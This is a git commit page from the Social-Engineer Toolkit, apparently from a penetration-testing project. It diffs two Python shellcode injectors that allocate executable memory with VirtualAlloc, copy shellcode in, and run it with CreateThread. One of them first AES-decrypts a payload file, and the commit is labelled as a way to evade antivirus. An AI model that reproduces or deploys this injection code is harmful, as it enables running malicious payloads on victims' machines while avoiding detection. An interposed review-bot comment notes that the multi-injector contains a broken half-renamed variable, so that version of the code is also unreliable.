Added new binaries to evade AV to pyinjector and multipyinjector

This commit is contained in:
TrustedSec 2013-06-18 03:46:20 -04:00
parent 8b1213c9e1
commit e1e4fe1e5e
4 changed files with 20 additions and 23 deletions

src/payloads/set_payloads/multi_pyinjector.binary Normal file → Executable file



@ -1,6 +1,6 @@
# #
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version. # The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.2 # Version: 0.3
# #
# This will spawn only a seperate thread per each shellcode instance. # This will spawn only a seperate thread per each shellcode instance.
# #
@ -18,19 +18,19 @@ from Crypto.Cipher import AES
import multiprocessing import multiprocessing
# define our shellcode injection code through ctypes # define our shellcode injection code through ctypes
def inject(shellcode): def injection(sc):
shellcode = shellcode.decode("string_escape") sc = sc.decode("string_escape")
shellcode = bytearray(shellcode) sc = bytearray(sc)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)), ctypes.c_int(len(sc)),
ctypes.c_int(0x3000), ctypes.c_int(0x3000),
ctypes.c_int(0x40)) ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf, buf,
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0), ctypes.c_int(0),
ctypes.c_int(ptr), ctypes.c_int(ptr),
@ -50,7 +50,7 @@ if __name__ == '__main__':
payload_filename = sys.argv[1] payload_filename = sys.argv[1]
if os.path.isfile(payload_filename): if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r") fileopen = file(payload_filename, "r")
shellcode = fileopen.read() sc = fileopen.read()
# if we didn't file our shellcode path then exit out # if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename): if not os.path.isfile(payload_filename):
sys.exit() sys.exit()
@ -70,17 +70,17 @@ if __name__ == '__main__':
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret) cipher = AES.new(secret)
# our decrypted value for shellcode # our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode) sc = DecryptAES(cipher, sc)
# split our shellcode into a list # split our shellcode into a list
shellcode = shellcode.split(",") sc = sc.split(",")
# except an indexerror and allow it to continue forward # except an indexerror and allow it to continue forward
except IndexError: except IndexError:
sys.exit() sys.exit()
jobs = [] jobs = []
for payload in shellcode: for payload in sc:
if payload != "": if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,)) p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p) jobs.append(p)
p.start() p.start()
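Review bot: The rename from `shellcode` to `sc` in `injection` is incomplete: the `from_buffer` line in the second hunk of this section still reads `buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)` on the new side, and `shellcode` is no longer bound anywhere in the visible hunks, so that line raises NameError. The same line in pyinjector_args.py was renamed consistently, so the matching form here is `buf = (ctypes.c_char * len(sc)).from_buffer(sc)`. The body of `injection` continues past the end of that hunk. Separately, the header comment kept in the first hunk still says the script spawns a separate thread per shellcode instance, while the `__main__` block in the last hunk starts a `multiprocessing.Process` per entry; the comment should say "process" (and "separate" is misspelled as "seperate").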

src/payloads/set_payloads/pyinjector_args.py Normal file → Executable file

@ -9,38 +9,35 @@ import sys
# see if we specified shellcode # see if we specified shellcode
try: try:
shellcode = sys.argv[1] sc = sys.argv[1]
# if we didn't specify a param # if we didn't specify a param
except IndexError: except IndexError:
print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec"
print "Example: pyinjector.exe \\x41\\x41\\x41\\x41"
print "Usage: pyinjector.exe <shellcode>"
sys.exit() sys.exit()
# need to code the input into the right format through string escape # need to code the input into the right format through string escape
shellcode = shellcode.decode("string_escape") sc = sc.decode("string_escape")
# convert to bytearray # convert to bytearray
shellcode = bytearray(shellcode) sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace # use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)), ctypes.c_int(len(sc)),
ctypes.c_int(0x3000), ctypes.c_int(0x3000),
ctypes.c_int(0x40)) ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space # use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
# read in the buffer # read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks # moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf, buf,
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
# launch in a thread # launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0), ctypes.c_int(0),